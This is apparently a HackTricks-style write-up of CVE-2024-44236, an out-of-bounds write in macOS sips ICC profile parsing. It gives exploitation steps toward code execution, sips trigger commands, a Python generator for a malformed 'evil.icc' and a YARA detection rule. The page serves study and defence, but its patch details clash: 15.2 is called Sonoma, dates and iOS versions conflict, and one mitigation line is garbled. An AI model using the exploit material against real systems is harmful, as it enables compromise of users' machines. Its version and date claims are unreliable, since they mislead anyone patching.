WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)

Reading time: 5 minutes

Overview

An out-of-bounds zero-write vulnerability in Apple macOS Scriptable Image Processing System (sips) ICC profile parser (macOS 15.0.1, sips-307) allows an attacker to corrupt heap metadata and pivot the primitive into full code-execution. The bug is located in the handling of the offsetToCLUT field of the lutAToBType (mAB ) and lutBToAType (mBA ) tags. If attackers set offsetToCLUT == tagDataSize, the parser erases 16 bytes past the end of the heap buffer. Heap spraying lets the attacker zero-out allocator structures or C++ pointers that will later be dereferenced, yielding an arbitrary-write-to-exec chain (CVE-2024-44236, CVSS 7.8).

Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.

Vulnerable Code

// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)
if (offsetToCLUT <= tagDataSize) {
    // BAD ➜ zero 16 bytes starting *at* offsetToCLUT
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0;            // no bounds check vs allocated size!
}

Exploitation Steps

1. Craft a malicious .icc profile

   • Set up a minimal ICC header (acsp) and add one mAB (or mBA ) tag.
   • Configure the tag table so the offsetToCLUT equals the tag size (tagDataSize).
   • Place attacker-controlled data right after the tag so that the 16 zero writes overlap allocator metadata.

2. Trigger parsing with any sips operation that touches the profile

   # verification path (no output file needed)
   sips --verifyColor evil.icc
   # or implicitly when converting images that embed the profile
   sips -s format png payload.jpg --out out.png
   

3. Heap metadata corruption ➜ arbitrary write ➜ ROP
   On Apple’s default nano_zone allocator, metadata for 16-byte slots lives immediately after the aligned 0x1000 slab. By placing the profile’s tag at the end of such a slab, the 16 zero-writes clobber meta->slot_B. After a subsequent free, the poisoned pointer is enqueued in the tiny free list, letting the attacker allocate a fake object at an arbitrary address and overwrite a C++ vtable pointer used by sips, finally pivoting execution to a ROP chain stored in the malicious ICC buffer.

Quick PoC generator (Python 3)

#!/usr/bin/env python3
import struct, sys

HDR = b'acsp'.ljust(128, b'\0')          # ICC header (magic + padding)
TAGS = [(b'mAB ', 132, 52)]              # one tag directly after header
profile  = HDR
profile += struct.pack('>I', len(TAGS))  # tag count
profile += b''.join(struct.pack('>4sII', *t) for t in TAGS)

mab = bytearray(52)                      # tag payload (52 bytes)
struct.pack_into('>I', mab, 44, 52)      # offsetToCLUT = size (OOB start)
profile += mab

open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))

YARA detection rule

rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "Detect CLUT offset equal to tag length in mAB/mBA (CVE-2024-44236)"
        author       = "HackTricks"
    strings:
        $magic = { 61 63 73 70 }          // 'acsp'
        $mab   = { 6D 41 42 20 }          // 'mAB '
        $mba   = { 6D 42 41 20 }          // 'mBA '
    condition:
        $magic at 0 and
        for any i in (0 .. 10):           // up to 10 tags
            (
              ($mab at 132 + 12*i or $mba at 132 + 12*i) and
              uint32(132 + 12*i + 4) == uint32(132 + 12*i + 8) // offset == size
            )
}

Impact

Opening or processing a crafted ICC profile leads to remote arbitrary code execution in the context of the invoking user (Preview, QuickLook, Safari image rendering, Mail attachments, etc.), bypassing Gatekeeper because the profile can be embedded inside otherwise benign images (PNG/JPEG/TIFF).

Detection & Mitigation

• Patch! Ensure the host is running macOS ≥ 15.2 / 14.7.1 (or iOS/iPadOS ≥ 18.1).
• Deploy the YARA rule above on email gateways and EDR solutions.
• Strip or sanitise embedded ICC profiles with exiftool -icc_profile= -overwrite_original <file> before further processing on untrusted files.
• Harden Preview/QuickLook by running them inside sandboxed “transparency & modernisation” VMs when analysing unknown content.
• For DFIR, look for recent execution of sips --verifyColor or ColorSync library loads by sandboxed apps in the unified log.

References

• Trend Micro Zero Day Initiative advisory ZDI-24-1445 – “Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)”
  https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
• Apple security updates HT213981 “About the security content of macOS Sonoma 15.2”
  https://support.apple.com/en-us/HT213981